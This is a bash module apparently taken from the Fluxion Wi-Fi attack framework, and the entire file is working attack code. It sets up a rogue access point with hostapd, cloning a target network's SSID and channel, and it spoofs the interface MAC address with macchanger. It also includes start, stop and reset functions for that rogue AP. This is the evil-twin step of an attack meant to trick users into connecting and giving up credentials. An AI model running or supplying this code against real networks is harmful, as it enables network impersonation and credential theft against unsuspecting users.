#!/bin/bash # ================================================================ # Configuration Section # ================================================================ VIGW=$WIAccessPoint VIAP=$WIAccessPoint # HostAPD sets the virtual interface mode # to master, which is supported by dhcpd. VIAPAddress=$VIGWAddress APServiceConfigDirectory=$FLUXIONWorkspacePath # ================================================================ #if [ "$APServiceVersion" ]; then return 0; fi #readonly APServiceVersion="1.0" function ap_stop() { if [ "$APServicePID" ] then kill $APServicePID &> $FLUXIONOutputDevice fi APServicePID="" } function ap_reset() { ap_stop # Reset MAC address to original. ifconfig $VIAP down sleep 0.5 macchanger -p $VIAP &> $FLUXIONOutputDevice sleep 0.5 ifconfig $VIAP up sleep 0.5 } function ap_route() { echo "APService: No custom routes for hostapd" > $FLUXIONOutputDevice } function ap_prep() { ap_stop # Prepare the hostapd config file. echo "\ interface=$VIAP driver=nl80211 ssid=$APTargetSSID channel=$APTargetChannel\ " > "$APServiceConfigDirectory/$APRogueMAC-hostapd.conf" # Spoof virtual interface MAC address. ifconfig $VIAP down sleep 0.5 macchanger --mac=$APRogueMAC $VIAP &> $FLUXIONOutputDevice sleep 0.5 ifconfig $VIAP up sleep 0.5 } function ap_start() { ap_stop xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" -title "FLUXION AP Service [hostapd]" -e hostapd "$APServiceConfigDirectory/$APRogueMAC-hostapd.conf" & local parentPID=$! # Wait till hostapd has started and its virtual interface is ready. while [ ! "$APServicePID" ] do sleep 1; APServicePID=$(pgrep -P $parentPID) done ap_route } # FLUXSCRIPT END